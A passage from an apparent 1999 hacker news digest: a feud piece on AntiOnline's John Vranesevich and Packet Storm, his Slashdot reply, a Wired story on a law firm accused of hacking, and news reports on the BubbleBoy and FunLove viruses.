nights later, along with one of the 14-year-old kids (whose face was shadowed out) who said he had stolen it. It made headline news on television, on radio talk shows and in major papers around the US. And what a story it was. As usual, the government wouldn't comment on any of it, so it was hard to know what was the truth and what wasn't. After a few weeks had passed and the attention started to die down, an e-mail popped onto a public mailing list, a list where people were talking about JP and his site. The mail said that JP's report on the secret military program was a hoax. It outlined how anyone could go to the Web site of the company that made the programs the government used, and how anyone could download them for a free trial period. After it was proven that what this e-mail claimed was true, a minor uproar ensued within security and hacking circles across the Internet. People demanded that JP correct his stories and admit that what he printed was false. Instead, JP simply took the story out of his news archives and never spoke on the subject again. A clean sweep under the rug. A few months passed and the flames of the fire under JP and AntiOnline were roaring. Everyone was up in arms over his stories and reports. Several of his previous reports were being reviewed and some were being proven false. People wanted to know how could he get away with such a hoax. Some of his stories were true and others appeared to be totally made up. As reports started to surface, and as some people started to mark JP as a sham, he started to panic. He pulled out his trump card and started sending letters and e-mails to people around the Internet telling them to stop doing and saying whatever it was he didn't like, under the threat of legal action. People had set up parity Web sites, places like AntiOffline, Anti-AntiOnline and the Innerpulse News Network, so he sent some of them e-mail whining for them to stop making fun of him, or he would bring them to court. He even went as far as sending e-mail to a 15-year-old high school kid who wrote and Web-posted a paper with a fictional person in it named "PJ," because he thought it might be somehow poking fun at him. Yes, JP told him he would seek legal actions against him—or his parents, or whomever he could—if he didn't take down his story. He sent e-mails to people running sites like Attrition, to their Internet provider, and to their Internet provider's provider, complaining about how attrition.org kept an archive of all the errors he had made, and how they were pointing them out to people whenever they were asked to. As a matter of fact, he even sent me e-mail telling me he would take legal actions against me if I didn't leave him alone. Hell, I bet The Synthesis gets a threatening e-mail after this story runs. Adam Penenberg, a columnist and the senior editor at forbes.com, the Forbes Magazine online site, said in a recent article, "Of course, JP has nothing against good press. It's the bad press that lets him unsheathe his sharpest weapon. No, not the facts; those would only get in the way. We're talking about the threat of a lawsuit." The list of people he has threatened to sue is longer than Santa Claus' Christmas list. Only one minor detail JP seemed to forget—we, his detractors, are also protected by the First Amendment, entitled to our opinions. If he doesn't like them, he doesn't have to listen. After JP's suing spree ended, he turned himself into the laughing-stock of Internet security and hacking circles by changing his mission statement. He went from being a reporter and a self-proclaimed security expert to being a simple "security enthusiast" and the Net's "number one hacker-catcher." He had, in effect, declared war on the underground because it hadn't accepted him as one of its own. "I have yet to see anything useful come out of AntiOnline or John Vranesevich; he has not contributed anything to the online community. Not one line of code, not one exploit, not one advisory has he issued. Most of the content on his Web site has been taken from elsewhere. He has done absolutely nothing, yet somehow maintains his status as some sort of information security God," says Space Rogue, who works with L0pht Heavy Industries (hacker collective on the forefront of the movement) and is the editor of the Hacker News Network. Mainstream media outlets stopped quoting JP, his sponsors started to withdraw their support, his hits were starting to drop, and according to one of his writers, he was finally operating in the red. "With his change in editorial viewpoint, however, along with his waning credibility among hackers, JP and AntiOnline became simply less useful to me as a source of knowledge or expertise. There are better sources for me to use to gain access to the hacking community, and there are better sources among the anti-hacker security community as well," says Michael Martinez, an Associate Producer at ABCnews.com, regarding JP's current stance on hacking. "This isn't a slam against JP or his site, because he's free to take his publication in any direction he likes and I wish him well. But for my purposes, the thing that made his site special—that bridge between hackers and security experts—is no longer there." Other long-standing security sites were starting to gain his traffic, and JP knew it. Packet Storm Security, one of the largest archives of free security tools and security-related topics on the Web, was becoming the main site on the 'Net for people interested in security. It had gigs and gigs of files and was updated every day, not to mention it was very anti-JP. Packet Storm had become so popular that its owner, Ken Williams, a graduate student at the University of North Carolina, couldn't afford to continue to operate it paying all the expenses out of his own pocket, so he asked for help. With the popularity of his site and how helpful he was to the Web community, an army lined up to offer him assistance—a line that included Harvard University, who offered to host his site on their systems for free. Ken jumped at the idea and spent the next month moving his site over, getting the system ready and putting in countless hours of upgrades for the grand re-opening. When it reopened, Packet Storm was getting hundreds of thousands of hits every day and was by far the biggest, most popular and most supported freeware security site on the Internet at that time, or for that matter, ever. What did JP do? In typical fashion, he bought a special computer program, or "bot" as they are called, which, when let loose on a Web site, basically rips off the entire site. He downloaded the Packet Storm info to AntiOnline for examination, and JP took what he wanted from it. During this raping of the Packet Storm site, the bot came across a private directory (not a publicly-visible directory). It had a picture of JP and his sister from their high school's online year book, as well as a collection of a few e-mails and Web sites Ken had been sent regarding JP (none of which were very favorable towards JP, but none of which I saw advocated violence or contained pornography). JP saw an opportunity and he ran with it. The next day, he contacted Harvard and told them Ken had a directory on his site containing "pornographic material," "degrading pictures" of him and his family, and contained "death threats" against the Vranesevich clan. He even went as far as to say he had hired a full-time security guard for his offices because he feared for his life, and that Harvard was going to have to pay the price if they didn't remove the site ASAP. Again in typical fashion, JP implied he was going to take legal actions against them. Harvard's reaction was knee-jerk: It had never been in a situation like this before, so the school sent someone to pull the plug on Packet Storm and dismantle the box. It was done so fast they didn't even talk to the administrators at Harvard who had direct control over the box, and didn't even notify Ken as to what was going on. Again, an online riot ensued. Wired and Zdnet ran stories on what had happened, and security circles and hackers alike were in an uproar, wanting JP's proverbial head on a digital platter. Because the site was part of Ken's Master's degree project and his access to it was totally cut off for weeks, he had to drop out of school or risk taking failing marks. There were rumors that Harvard might try to sue him, and JP as well. Soon the tide started to turn, the truth came out and JP found himself taking the brunt of the 'Net community's wrath. Ken was a popular person and his site was totally free, while JP was despised by many and his site was commercial. At DefCon '99 (DefCon is an annual hacker convention held in Las Vegas), there were "Wanted" posters all over the hotel. They featured a picture of JP, called him a narc and gave information about some of the stuff he is alleged to have done. There were so many sites on the 'Net going after JP, it was difficult to keep track of them all, and the number of attacks against AntiOnline soared so high that the site's Internet Provider, StarGate.net, had to pull the plug on his site several times to avoid crashing their entire network. All this wasn't totally bad, though. Ken Williams was eventually offered a high-paying security job and his site was bought for a reported (not confirmed) $125,000 by the security firm Kroll-O'Gara, and put back online a month later. According to Carolyn Meinel, a staunch JP supporter, writer, consultant and far from a favorite in hacker circles herself, "John Vranesevich showed courage and compassion for his kid sister when he complained to Harvard that Ken Williams' Packet Storm Web site carried her photo, home address and incitements to harm her. Vranesevich could have just sat on his rear end and waited for the police to go after Ken. Instead, he got the threatening material removed forever from the Web, Williams got paid a ton of money for the technical portion of Packet Storm, and now the loud mouths of the computer security industry say Vranesevich was the bad guy." Despite these kind words from his friend, JP is still on the outs with most of the security world and hackers alike. As of this day, if you were to visit AntiOnline, it would almost read like you were on the Web site of an extremist group. JP comes across like he is against anything and everyone whose views do not match his, and he is apparently very bitter because of the nonstop attacks against him. In a recent story posted on his site, (http://www.antionline.com/cgi-bin/features/News_Spoof?date=10-06-1999) he joked about how some of his critics at Attrition had joined forces with pedophiles. After being accused of this, Brian Martin, the founder of Attrition and a security professional said, "It is truly unfortunate that a single person is duped by Vranesevich and AntiOnline. Their history of libel and slander, inaccurate and biased 'journalism,' sparse news updates and other unprofessional behavior represents the baseline of negativity and unethical actions." How low can someone go when they say their critics rape children? Why does he do it? It's simple—he wants the attention. There is an old saying, "bad press is still press," and at this point, JP is itching for any press he can get to drive up his hits, even if it means pissing off everyone on the Internet in the process. "I am constantly amazed at how John Vranesevich pisses off large numbers of people seemingly on purpose. From my point of view, it seems as though he purposely stirs up controversy to draw attention to his site and himself," says L0pht Heavy Industries' Space Rogue. "We're thinking about making JP honorary director in charge of global marketing [for Packet Storm Security]," says Matt Barrie, the current director of Packet Storm Security for Kroll-O'Gara, in a blatantly sarcastic, humorous tone. "He created the opportunity for us to obtain it, creating so much hype in the process that we now get more hits to the site than Ken ever did, plus he links to us from AntiOnline. We love the guy! The more he says, the more we benefit! Keep up the good work!" At this point, JP will probably be glad this article came out just because it's more time his name will spend in the print. The JP story continues on to this day. People are still criticizing him, attempting to prove him as a fake, while he still goes on writing stories and continuing to "work with the FBI catching evil hackers across the country," as he boasts. Well, that last part is still a matter of debate. When I contacted the FBI's public relations department and submitted my questions regarding JP and AntiOnline, they said they do not comment on any ongoing case, anyone they might have under investigation, or anyone who might be working with them anonymously supplying tips. They did note, however, that they had no records of any contract with anyone named John Vranesevich or a company called AntiOnline. I guess this means he could be supplying tips to the FBI, anonymously or otherwise, but anyone can do that via a 1-800 number. Besides, does that constitute a working relationship with the FBI? I think Ken Williams, founder of Packet Storm Security who now works professionally in the security world, put it best: "The fact that the FBI 'consults' with JP does not in any way validate the work of a technologically-inept jackass who thrives on intimidation. It does, nevertheless, illustrate why the FBI should now give Special Agent badges to JP, Elvis and maybe even the Easter Bunny." Bronc Buster is an established California-based hacker who was featured in SPIN Magazine's November, 1999 issue. He can be reached via e-mail at bronc@2600.com. Web sites and articles mentioned in this story, as well as places to find out more information about this subject: Was it a library or a high school JP set the lab up in? Who did what at Pitt? How did JP first get his site up? What did he tell the NY Times? See for yourself through the links below: http://www.wired.com/news/news/culture/story/8685.html http://www.wired.com/news/news/culture/story/9116.html http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html Attrition joins forces with Pedophiles? http://www.antionline.com/cgi-bin/features/News_Spoof?date=10-06-1999 Forbes Story on JP: http://www.forbes.com/columnists/penenberg/1999/0927.htm Cyber Wire Dispatch Story (mirror thanks to HNN): http://www.hackernews.com/orig/CWD0899.html Attrition archives of JPs errors: http://www.Attrition.Org/negation Other sites of interest in regards to this article: http://www.antionline.com – AntiOnline http://www.attrition.org – Attrition web site http://packetstorm.securify.com – Packet Storm Security http://www.slashdot.org – Slash Dot News http://www.hackernews.com – Hacker News Network http://www.happyhacker.org – Carolyn Meinel’s Happy Hacker web site http://www.2600.com – 2600 Magazine http://www.innerpulse.com – Inner Pulse News http://www.defcon.org – DefCon Convention Web Site http://www.l0pht.com – L0pht Heavy Industries Bronc Buster is an established California-based hacker who was featured in SPIN Magazine’s November, 1999 issue. He can be reached via e-mail at bronc@2600.com. The non-interview; Posted by Roblimo on Friday November 12, @11:22AM from the bobbing-and-weaving-and-ducking dept. Monday, when we asked you to Grill John Vranesevich, we got mostly flames (as expected), but somehow we managed to extract 12 hard-nosed questions from the ashes. Sadly, Mr. Vranesevich chose not to respond to them directly, but sent an argumentative screed instead. Below you'll find the questions we sent, followed by Mr. Vranesevich's essay in its entirety (including his original HTML formatting), along with a link to a Forbes story that is, um, not exactly complimentary to him. Question #1 by manitee Having read many accounts of your interactions with the staff of attrition.org, it seems to me that your claims against them are generally unproven and rash. Their rebuttals are always filled with detailed fact and systematic, step by step analysis of the topic at hand. Please clarify why you feel that attrition.org is such a dangerous force, yet you have never been able to present HARD EVIDENCE to that point. Question #2 by davidu Many of us in the hacker community (not cracker) used the Packet Storm security site for information and research. You had it shut down for some alleged things in the /jp directory. Explain to us why you called [Harvard] to shut it down rather than dealing with the maintainer. What did you accomplish by threatening to sue other than futher harm your image and remove any creditbilily you had? Question #3 by Kintanon What is the basis for your attacks on security Experts such as Attrition.org? To Clarify the question: Why do you proclaim them to be 'dangerous hackers' while they do essentially the same thing you claim to do, except that they do so better, faster, and more professionally? Question #4 by mattc Why did you deliberately block links from Slashdot, HNN, and any other site who criticized you during the closure of Packetstorm? #5 by WH How do you respond to allegations that the FBI is investigating your knowledge of attacks before they happened and the accusations by some hackers who performed said attacks that you paid them or otherwise coerced them to do it in order to have coverage for your website? #6 also by WH Why do you feel that sites containing satirical humor based [on] antionline are not protected by law and therefore open to your threats of legal action? #7 by Hard_Code Are the rumors that you will be spinning off a sister site called Anti-Anti-Anti-Online to dispell the malicious accusations and deprecations of your obviously magnanimous professionalism and intellect and to further bolster the image of Anti-Online and your integrity as a computer- security- expert- guru- enthusiast, true? #8 - #11 by Jeff - (Heavily edited - RM) I have several questions which I will ask within the narrative below. The narrative is important to understand the context of the questions, and to support my arguments. Several months ago I was raided by FBI for supposed involvement with the "hacker" group gh. The extent of my involvement was participating, as a caller only, in illegally funded phone conferences. JP, who also participated in this conferences, labeled me as a hacker, and a member of gh on his "news" site. Neither of these accusations are true. He has many more ties to this and other hacker groups than I have ever had.... #8 - How can you pretend to be taking a stand against "hackers" while you are involved in the same activities? #9 - My third question is in regards to your coverage of the situation. You posted unconfirmed information from an unreliable source in regards to the status of my employment at a prominent software development company. As a result of this I was contact by several news agencies, and immediately stereotyped as a hacker even though I have never illegally penetrated any computer system, nor had I been charged with, or accused of any crimes by the FBI. In response to this I granted one news agency an interview, which I thought went well, but also backfired. As a result of the negative press my former employer could not even consider allowing me to stay. My question being, Do you expect people to consider you as a reliable news source even though you report data which you receive through unreliable channels? #10 - Did you ever stop to think what the impact of your coverage might be? It seems to me that in your rush for the big story you have failed to check for the correctness in your articles, and as a result of this you are hurting innocent people, such as myself. I'm sure this has gone on in other cases, but mine is the only one I have enough knowledge to comment on. I don't attribute these unfortunate events to you, but you certainly did not follow good news practices in reporting them. You have only served to injure my credibility and your own. 11 - Lastly, have you ever considered what legal action may be taken against you for your involvement with these criminals? Do you even recognize the hypocrisy of your stance on hackers being one yourself by your own definition? Question #12 by sonoffreak Why did you decide to let Slashdot interview you? How did the response you got compare to what you expected? John Vranesevich's Response: Greetings All Well, I've seen many people say that I can't take criticism. Believe me, if that were true, I surely never would have opened myself up to a SlashDot inquisition. I knew before I even agreed to the interview, that things would be ugly. Needless to say, I was right on the money. However, I will say this. I was very disappointed in the downright lack of maturity that many of the posts showed. I like to believe that most people who frequent this type of forum are of an intellectual nature. I found it very disheartening to hear nearly every rumor ever voiced about myself or my company being regurgitated as if they were all fact. An educated bunch of people should understand that not everything that they hear is true at all, and that almost nothing that they hear is totally accurate. But, some of that could be my fault. Many posts pointed out the fact that I have never "given explanations of" or provided "blow-by-blow responses" to any of the things that have been written about me. This is true. If I spent my life defending myself from every individual who had a nasty thing to say about me, my life would end up pretty meaningless in the end. I think that's true for most people. I decided a long time ago that I wouldn't allow myself or my website to become dedicated to those who would seek to bring me down. I have a lot of goals in my life, and I'm not about to let nonsense get in their way. But, never the less, I saw this SlashDot invitation as the perfect opportunity to talk about some of those very issues. It's not that I feel that people who posted negative comments will read what I have to say, and then decide that they were totally wrong about me. Those who despise me for whatever reason will continue to do so no matter what I ever say or do. Even SlashDot faced the wrath of dozens of people who are "no longer going to visit this site" for one reason or another after reading the interview bio on Monday. So much for loyalty in this day and age I suppose. Yours In CyberSpace, John Vranesevich Founder, AntiOnline Now, On To The Questions I received a list of "questions" from Robin earlier this week, and to put it bluntly, they were just stupid. I'm not going to waste my time writing up ridiculous answers to ridiculous questions that no one really cares about. For example, here is one of the questions posed to me "Are the rumors that you will be spinning off a sister site called Anti-Anti-Anti-Online to dispel the malicious accusations and deprecations of your obviously magnanimous professionalism and intellect and to further bolster the image of Anti-Online and your integrity as a computer-security-expect-guru-enthusiast, true?" Now how stupid is that? What would my answer be, something like "Um, no". Not a very stimulating Q&A if you ask me. So, instead of wasting my time and yours, I decided that I'd simply cut to the chase, and answer what appear to be some of the major allegations, accusations, and other such tidbits that some people seem obsessed over. AntiOnline & PacketStorm First off, let me say that I didn't shut down PacketStorm, and neither did Harvard. Ken Williams is the sole person responsible for that site being shut down. He chose to take a popular forum which was designed to disseminate information related to computer security, and abuse his own creation in order to harass someone. Sure, post satire about myself or my website. I truly don't care, and in many cases, I have even promoted such websites on AntiOnline. One such satire site that I've linked to several times is "AntiOffline.com". Personally, I consider satire as one of the greatest type compliments one can get. However, what Ken did far surpassed simple satire. By posting a photo of my younger sister (who was a minor at the time), along with her full name and address, he successfully started a mass campaign of harassment against her and my family. This I wouldn't tolerate. I don't care how popular of a site it was, or how valuable of a resource it was. It was abused by Ken Williams for his own perverse sense of amusement, at the cost of my family. As for all of this "threaten to sue" hype which soon followed. I never did any such thing. I'm not sure which University Official ever told Ken Williams that, if any, but he was certainly mistaken. I sent a simple one page e-mail to the provost's office asking them to review the contents of the site against their acceptable use policy. Despite Ken's claims that there wasn't any "offending" material on the site, the university reviewed it, and chose to shut it down. A major and prestigious university like Harvard wouldn't simply shut down a site because some pissant like myself sent them an e-mail, unless there was a very good reason to do so. Use your common sense people. However, what Ken Williams did was a very successful campaign of pity afterwards. I will admit that. "A poor college student who's website was shut down by an evil corporation called AntiOnline. Who's college career has been ruined, and all of his hard work lost". Truth of the matter is that Ken is in his 30s, and isn't some naive little college freshmen. He got his site shut-down by harassing a 17 year old girl, which shortly after being shutdown, Ken sold for a reported $125,000 to Kroll. Poor Ken. AntiOnline & Attrition This is even more stupid than Ken Williams. Despite all of the crap, and there really isn't a better word for it, which has pored out of Brian Martin and his Attrition.org site, I think I can sum up events in one small paragraph AntiOnline was asked by the FBI to help investigate a group called "HFG" which broke into the New York Times' Website. AntiOnline does some digging, and turns over its findings. Shortly there after, Brian Martin, founder of Attrition.org, and someone that no one at AntiOnline had ever had any contact with before, was raided by the FBI. Ever since then, for some strange reason, Brian Martin has attempted to do anything and everything he can to discredit myself and AntiOnline. Wonder why? Is it because I'm an evil menace to society that threatens the very existence of the internet and all that is good? I wouldsubmit to you that Brian Martin's motivations are far more geared towards protecting his own ass, than they are geared towards protecting society's ass. Once again, use your common sense. What exactly does AntiOnline Do? That's something I see asked a lot on "underground" type webpages. To be frank, we're not a public company, and it really isn't anybody's business except those that we work with. I can, however, tell you this. The fact that nearly every malicious hacker (or cracker if you prefer the term) dislikes AntiOnline is actually good for us, and is the exact position I want to be in. Some people even "joke" that I intentionally try to "piss off large groups of people at a time". Well, it's not just a joke, it's the truth. I think I'm pretty good at doing it too. We average between 200-500 intrusion attempts against one of our systems AN HOUR, and every time I piss another segment of the cyber-population off, that number skyrockets. We probably have one of the most targeted networks on the internet today, and we take full advantage of that. Do you think that we let the type of data that we're able to collect and log just go to waste? I don't ;-) Is AntiOnline Being Investigated By The FBI? To tell you the truth, I doubt it, but I don't know for sure. But, there's a reason why I don't know for sure. The FBI doesn't talk to anyone about who they are/have investigated. Anyone that has ever worked with the FBI in any manner, can tell you that they, as a rule, keep quite in order to protect any investigation. If they were to deny reports about us being investigated, that would confirm in the minds of others that they are being investigated, when the FBI comes up with a "no comment" answer. Make sense? Here's where things get funny. The person that "blew the lid off of the story" that AntiOnline was being investigated by the FBI is none other than, you guessed it, Brian Martin of Attrition. He told a reporter that an FBI agent "informed him" about the active investigation. Common sense time. Would the FBI raid someone (like Brian Martin was), and then shortly there after begin telling that person about all of the other investigations that they are doing so that they could spread the word all over the Internet and ruin their case? Personally, I would highly doubt that the FBI would consult with us if they suspected, or were investigating the possibility, that AntiOnline was some evil criminal empire that paid people off to break into high profile websites so that we could post an interview. Get real people. Does it bother you that everyone hates you. Why or why not? This is something that I actually saw posted on the message board. To be honest, at this point in my life, my goal is not to become loved in the hearts of the masses. I'm not running for political office, so popularity doesn't count. I have goals in my life that I want to achieve. Some of these goals are short-term, some of them are long-term. Right now, at the age of 21 (as of October), I'm exactly where I want to be. My professional career is on track, financially I'm in good shape, my personal life is where I want it to be, and I can say that every day brings me closer to the goals that I have set for myself. Who could ask for more? Sure, I have to put up with a lot more flack and B.S. than the average 21 year old. But I'll tell you this, every minute is worth it. To learn more about John Vranesevich as he was seen through the eyes of at least one reporter for a respected news outlet, read this Forbes article. - RM @HWA 42.0 Strange Corporate Hacking Saga ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.wired.com/news/print/0,1294,32488,00.html by Craig Bicknell 3:00 a.m. 12.Nov.1999 PST Judge Thomas Penfield Jackson may have a head full of Microsoft hoo-ha. But he's going to have to make some room for another case. No lofty antitrust issues here. This one's a weird little cyber-drama starring a personal data-sales Web site called Dig Dirt, its cybersquatting owner, and a prestigious law firm that allegedly hacked into Dig Dirt's digs. Michael Moore, owner of DigDirt.com's parent, Moore Publishing, this week filed suit in US District Court for the District of Columbia accusing the august Washington law firm of Steptoe & Johnson of launching a "cyber war" against Moore Publishing and Dig Dirt. He's demanding US$10 million in damages, and the case has landed in Jackson's court. Moore charges that, among other things, Steptoe employees cracked into Dig Dirt and other Moore Publishing sites some 750 times, posted defamatory messages about Moore on Usenet, and tried to cover it all up by doing their evil deeds under an e-identity swiped from an Alexandria, Virginia, furniture store owner. Steptoe declined comment beyond this terse statement: "Steptoe & Johnson LLP denies the allegations against it. Unlike Moore Publishing Company Inc. and its counsel, Steptoe & Johnson LLP will not litigate this case in the media. We will respond in the Court where these matters are properly addressed." No such reservations for Moore's attorney, solo practitioner Rodney Sweetland, who happily offered up his version of the story. On 4 August, according to Sweetland, somebody from Steptoe cracked into Dig Dirt, a site that fronts an enormous database of personal data gleaned from public records. Dig Dirt sells the data to private investigators, lawyers, and law enforcement agencies. The supposed Steptoe hacker did no damage, but left obvious electronic tracks back to Steptoe's servers. The hacker didn't actually break in through digdirt.com, however. He broke in through an alternate URL, CDBInfo.com. The URL bears a striking resemblance to the name CDB Infotek, a data-selling competitor to Dig Dirt. In fact, CDB Infotek is the data-selling competitor that Steptoe & Johnson uses when it needs background dirt on somebody. Why the heck does CDBInfo.com lead to Dig Dirt's site? Well, there's this matter of Moore Publishing's apparent side business -- cybersquatting. Moore owns dozens of URLs, including campaign-related domains like "Whitmanforsenate.com," names of other database competitors, and even the names of some prominent law firms, including SteptoeJohnson.com. Sweetland wouldn't confirm that his client's domains were for sale. To continue. After the initial "crack," Sweetland contacted Steptoe & Johnson and demanded an explanation. Steptoe denied all guilt. In early September, Moore Publishing filed suit in Jackson's court, demanding Steptoe pony up $800,000 to pay for its supposed misdeeds. Steptoe refused the proposed settlement and filed a motion to dismiss the case, countering that there had been no hack. The law firm said one of its employees "did the Internet equivalent of knocking on the wrong door," accidentally ending up at Dig Dirt when he'd been headed for CDB Infotek. Moore's suit, claimed Steptoe, was "yet another way of making money from the pernicious activity of cyber-squatting." Meanwhile, according to the expanded Moore suit filed this week, a whole new wave of Steptoe-led computer attacks was already under way. The attacks began shortly after Sweetland contacted Steptoe about the first "attack" in early August, the suit charges. Steptoe tapped one of its computer systems employees, Thomas Felt, to investigate Moore Publishing's claims. Moore Publishing sites were subsequently hit by a wave of denial-of-service attacks, apparently designed to overwhelm Moore's servers. Moore determined the attacks were originating in the servers of a Virginia Net hosting company. Sweetland subpoenaed the hosting company's records, which revealed the precise origin of the assault: the account of one Lois Gloor, a furniture store owner in Alexandria. Sweetland called Gloor. She had no clue what he was talking about, he said. But she did say a part-time consultant had recently helped set up all her computer systems. The consultant's name: Thomas Felt. According to Sweetland, Felt swiped Gloor's passwords and account info, using them first to launch numerous assaults against Moore Publishing in early September, then to post defamatory messages about Moore on Usenet. One such post read, in part: "I guess business must be bad ... now they are trying to shake down law firms ... ask Michael why he has filed a sham lawsuit against Steptoe.... I guess he needs the money. Just thought everyone should know what kind of people these guys are ... the lowest of the low, and now they are turning to computer crime." As a result of the supposed identity heist and the Usenet posts, Moore Publishing has expanded its case to include charges of computer fraud and defamation. Was the supposed assault on Dig Dirt ordered from on high within Steptoe? Sweetland said he doesn't think so. "It looks to me like a bunch of cowboys in the computer department went off the reservation," he said. That doesn't absolve Steptoe of responsibility, said Sweetland. And if someone in the firm was upset by Moore's first suit or his client's apparently self-interested ownership of the SteptoeJohnson.com domain, they chose a poor way to show it. "To the extent that Steptoe Johnson had any contention with [Moore's] use of the [SteptoeJohnson.com] domain, there are legitimate avenues of redress," he said. "They could have gone to NSI, but they didn't. What you can't do is hack, defame, and use denial-of-service attacks, and that's what happened." Steptoe undoubtedly will offer up a different version of events, and it'll be up to Judge Jackson to decide what's what. After his experiences with the Microsoft trial, Jackson should have a good grasp of the terrain. "He's probably one of the most computer-savvy judges out there, by necessity," said Sweetland. @HWA 43.0 BubbleBoy Breaks Out of Lab - Found on Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Scores The most recent media darling virus BubbleBoy, has now been found in the wild. A Japanese web site devoted to collecting viruses has posted BubbleBoy for all to download. It was previously thought that BubbleBoy existed only in the lab. BubbleBoy only effects users on the English and Spanish versions of Microsoft Outlook. MSNBC http://www.msnbc.com/news/333265.asp BubbleBoy virus found on Net Web page devoted to collecting viruses has a copy; First-of-its-kind program infects users just reading e-mail By Bob Sullivan MSNBC Nov. 11 — The BubbleBoy virus, which sent shudders through the antivirus community earlier this week, is no longer just a lab rat. MSNBC has confirmed that the virus — and an updated version 1.1 of the program — has now been posted on a Web page hosted in Japan devoted to collecting viruses. A look at the virus reveals a few more details about the program. WHILE THE VIRUS is now available for download and imitation by virus writers, there as yet have been no reported victims of the program. A text document connected to the virus claims the nefarious program was written by a virus writer named “Zulu” and suggests the program originated in Argentina. That text file also goes on to credit the security expert who first discovered the vulnerability exploited by the virus: “First e-mail worm (without using attachments),” according to BubbleBoy.txt. “It uses a vulnerability discovered by Georgi Guninski in which many versions of Internet Explorer 5 allow any HTML file or e-mail to write files without ActiveX authorization.” It also notes the virus will only work in English and Spanish versions of Microsoft Outlook. The long-feared new breed of computer virus emerged late Monday, according to antivirus firms. The so-called BubbleBoy virus can infect Internet users when they open, or even simply preview, an infected e-mail. “Historically we’ve always said, as long as you don’t open attachments, you’re safe,” Network Associates spokesman Sal Viveros said. “That’s not true any more.” It was apparently created by a a fan of the U.S.- TV sitcom “Seinfeld.” The name appears to have been taken from an episode of the show. Another famous character, the Soup Nazi, is referenced in the virus’ code itself, as is Vandelay — an apparent reference to Vandelay Industries, a fictitious company where hapless George Costanza claimed he was employed. The virus arrives with the subject line “Bubbleboy is Back!” The body of the message includes the text “The BubbleBoy incident, pictures and sounds.” There’s also a link to a non-working Web page — http://www.towns.com/d= orms/tom/bblboy.htm. Bubbleboy is a “proof of concept” virus that has no dangerous payload, meaning it doesn’t attempt to delete or alter files. But it does have the ability to create a “Melissa-like” mail storm as it sends copies of itself to every e-mail address in the victim’s address book. For over a year, security experts have raised the concern that e-mail itself — rather than an e-mail attachment — can transmit a computer virus. The problems are caused by e-mail readers that render HTML, like Microsoft’s Outlook or Eudora Pro. Since these programs allow Web-page-like formatting within the body of the message, they also allow execution of code. With Outlook Express, that code can be executed even before the message is open, thanks to the “preview pane” included with the software. (Microsoft is a partner in MSNBC.) But while the possibility has existed theoretically, BubbleBoy is the first virus to exploit it, Viveros said. Thanks to virus crises like Melissa, most Internet users seem used to the idea that opening e-mail attachments can expose their computers — but reading e-mail itself has always seemed safe. Not any more, according to Viveros. “This really changes the way people need to react to viruses,” he said. “You can’t really tell people, ‘Don’t open e-mail.” In fact, it’s unclear exactly how users of HTML-enabled e-mail readers can protect themselves from such viruses. Regularly updating antivirus software will filter out most viruses, but virus writers are usually a half-step ahead of antivirus software — new ill-intentioned programs are almost always able to slip through defenses during the first few hours after their release. “Until yesterday, I was telling people, ‘Don’t open attachments unless you know why the person sent it to you,’ ” said Dan Schraeder, vice president of new technologies at antivirus firm Trend Micro. “Now I get nervous just opening e-mail.” BubbleBoy was sent anonymously to Network Associates Monday night, Viveros said, probably by the author. At that time, it was declared just a lab rat — no antivirus firm had reported seeing BubbleBoy in the wild. “This virus has not been posted at any hack site we are aware of. We don’t expect to see variants of it popping up all of the sudden,” Schraeder said Tuesday. But that’s no reason to dismiss it. “Historically, what we’ve seen is people take proof-of-concept viruses and create dangerous payloads for them,” Viveros said. HOW THE VIRUS WORKS The virus only affects Microsoft Outlook users with Internet Explorer 5.0, and only if Windows Scripting Host is installed (standard in Windows 98 and Windows 2000 installations). If security settings for Internet Zone in IE5 are set to High, the worm will not be executed. It does not run on Windows NT. According to Schraeder, the virus actually takes advantage of a security flaw in Microsoft’s ActiveX technology that was discovered in August. Two components of Internet Explorer 4.0 and 5.0, scriptlet.typelib and Eyedog, are incorrectly labeled as “trusted” — meaning they can retrieve and alter critical information on a user’s computer. BubbleBoy calls on these controls through scripting in the body of an e-mail message in order to access a victim’s computer. Users who have installed Microsoft’s patch for the flaw (available from this Web site) are not vulnerable to BubbleBoy, but they may be vulnerable to other HTML/e-mail attacks. “This is a good wake-up call for us, to remind people they need to get the latest security updates and update their virus scanning engine,” Schraeder said. @HWA 44.0 'Fun Love' Warning Issued ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by nvirb A virus known as FunLove, appears as an executable file, and has already infected a large European company. When an administrator logs onto an infected WindowsNT system the virus grants administrator rights to all users. Descriptions for the virus have been added to Anti-Virus companies definition files. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,1018115,00.html?chkpt=zdnntop -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Researchers warn about 'FunLove' virus By Jim Kerstetter, PC Week November 11, 1999 1:40 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,1018115,00.html There's nothing tender about the new FunLove virus. The virus, technically called W32.FunLove, brought down the servers of a large company in Europe and has been detected in companies in the U.S., as well, according to researchers at Symantec Corp.'s (Nasdaq:SYMC) AntiVirus Research Center. The good news is that it shouldn't spread all that fast because it doesn't have the ability to e-mail itself like the Melissa virus, said Charles Renert, director of research at SARC. The bad news is that it uses a new way to attack the file security system of the Windows NT operating system. The virus may also use the network to spread itself. "It's a little bit of an evolution as far as virus writing is concerned," said Renert. How it works The virus appears as an executable file running on all flavors of Windows, from Windows 95 on up. The only way to recognize that a machine has been infected is by finding the fclss.exe file the virus drops into the Windows System directory. In turn, it infects applications with EXE, SCR or OCX extensions. The real goal of the virus is to attack the Windows NT file security system. In order for the virus to attack, it needs administrative rights on an NT server or workstation. Once an administrator logs on to NT, the virus modifies the NT kernel so that every user has administrative rights to that machine, regardless of the protection. This means that a "guest" -- someone with the lowest possible rights on the system -- would be able to read and modify all files, including files normally accessible only by the administrator. Symantec officials said they have added virus definitions to recognize FunLove and should have a tool available shortly to help repair an infected machine at www.symantec.com/avcenter/download.html. Earlier this week, researchers issued warnings about the so-called BubbleBoy virus -- actually a self-replicating worm -- that can spread itself through Microsoft Corp.'s Outlook and Outlook Express software. @HWA 45.0 Simple nomad to speak at ToorCon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN 